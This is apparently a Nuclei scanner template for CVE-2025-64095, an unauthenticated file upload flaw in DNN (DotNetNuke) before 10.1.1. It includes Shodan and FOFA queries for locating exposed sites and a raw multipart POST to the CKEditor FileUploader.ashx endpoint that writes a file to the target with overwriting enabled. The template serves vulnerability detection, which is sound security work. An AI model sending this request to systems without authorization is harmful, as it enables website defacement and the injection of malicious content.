id: CVE-2025-64095

info:
  name: DNN - Unrestricted Arbitrary File Upload
  author: DhiyaneshDk,pussycat0x
  severity: critical
  description: |
    DNN (formerly DotNetNuke) \u003C 10.1.1 contains an unrestricted file upload vulnerability caused by the default HTML editor provider allowing unauthenticated file uploads and overwriting existing files, letting unauthenticated attackers deface websites and inject XSS payloads, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can upload and overwrite files, leading to website defacement and cross-site scripting attacks.
  remediation: |
    Update to version 10.1.1 or later.
  reference:
    - https://github.com/h4x0r-dz/CVE-2025-64095---DNN-Unauthenticated-arbitrary-file-upload
  metadata:
    verified: true
    max-request: 1
    vendor: dnnsoftware
    product: dotnetnuke
    shodan-query:
      - "Set-Cookie: dnn_IsMobile"
      - http.favicon.hash:-1465479343
    fofa-query:
      - app="dotnetnuke"
      - "Set-Cookie: dnn_IsMobile"
      - icon_hash="-1465479343"
  tags: cve,cve2025,intrusive,file-upload,dnn,vkev

variables:
  filename: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /Providers/HtmlEditorProviders/DNNConnect.CKE/Browser/FileUploader.ashx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=------------------------7RKjWLYyrhvUn2AA31fJQ3

        --------------------------7RKjWLYyrhvUn2AA31fJQ3
        Content-Disposition: form-data; name="file"; filename="{{filename}}.png"
        Content-Type: image/png

        {{randstr}}
        --------------------------7RKjWLYyrhvUn2AA31fJQ3
        Content-Disposition: form-data; name="storageFolderID"

        1
        --------------------------7RKjWLYyrhvUn2AA31fJQ3
        Content-Disposition: form-data; name="portalID"

        0
        --------------------------7RKjWLYyrhvUn2AA31fJQ3
        Content-Disposition: form-data; name="overrideFiles"

        1
        --------------------------7RKjWLYyrhvUn2AA31fJQ3
        Content-Disposition: form-data; name="mode"

        Default
        --------------------------7RKjWLYyrhvUn2AA31fJQ3--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"group"'
          - 'delete_type'
        condition: and

      - type: word
        part: content_type
        words:
          - "text/plain"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220756a18de0cdc3ace6e4650ae86ac2487c1d462b38358f70237bf83b7d148d778022100c6a3060b167abed05219a2fb8bbd56959619960db32c3d7285e140e45a557b9e:922c64590222798bb761d5b6d8e72950